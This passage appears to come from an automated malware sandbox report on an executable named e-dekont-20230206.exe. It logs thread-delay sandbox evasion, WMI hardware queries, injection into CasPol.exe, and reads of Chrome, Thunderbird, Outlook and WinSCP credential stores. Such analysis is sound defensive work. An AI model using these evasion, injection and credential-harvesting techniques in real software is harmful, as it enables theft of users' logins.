        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
        Source: C:\Users\user\Desktop\e-dekont-20230206.exe TID: 2216Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5604Thread sleep count: 9564 > 30Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -18446744073709540s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1200000s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1199781s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1199641s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1199422s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1199297s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1199167s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1199015s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1198906s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1198797s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1198641s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1198531s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1198404s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1198279s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1198171s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1198041s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1197921s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1197813s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1197641s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1197496s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1197390s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1197264s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1197156s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1197031s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196922s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196813s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196641s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196510s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196406s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196288s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196171s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196063s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195953s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195844s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195703s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195593s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195484s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195374s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195265s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195155s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195042s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1194922s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1194812s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1194703s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1194593s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1194483s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1194375s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1194263s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1200000Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199781Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199641Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199422Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199297Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199167Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199015Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198906Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198797Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198641Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198531Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198404Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198279Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198171Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198041Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197921Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197813Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197641Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197496Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197390Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197264Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197156Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197031Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196922Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196813Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196641Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196510Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196406Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196288Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196171Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196063Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195953Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195844Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195703Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195593Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195484Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195374Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195265Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195155Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195042Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194922Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194812Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194703Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194593Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194483Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194375Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194263Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9564Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1200000Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199781Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199641Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199422Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199297Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199167Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199015Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198906Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198797Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198641Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198531Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198404Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198279Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198171Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198041Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197921Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197813Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197641Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197496Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197390Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197264Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197156Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197031Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196922Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196813Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196641Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196510Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196406Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196288Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196171Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196063Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195953Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195844Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195703Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195593Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195484Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195374Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195265Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195155Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195042Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194922Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194812Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194703Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194593Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194483Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194375Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194263Jump to behavior
        Source: CasPol.exe, 00000001.00000002.560208417.0000000006252000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000Jump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 42C000Jump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 42E000Jump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: F20008Jump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exeJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeQueries volume information: C:\Users\user\Desktop\e-dekont-20230206.exe VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000001.00000002.558103667.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2256, type: MEMORYSTR
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
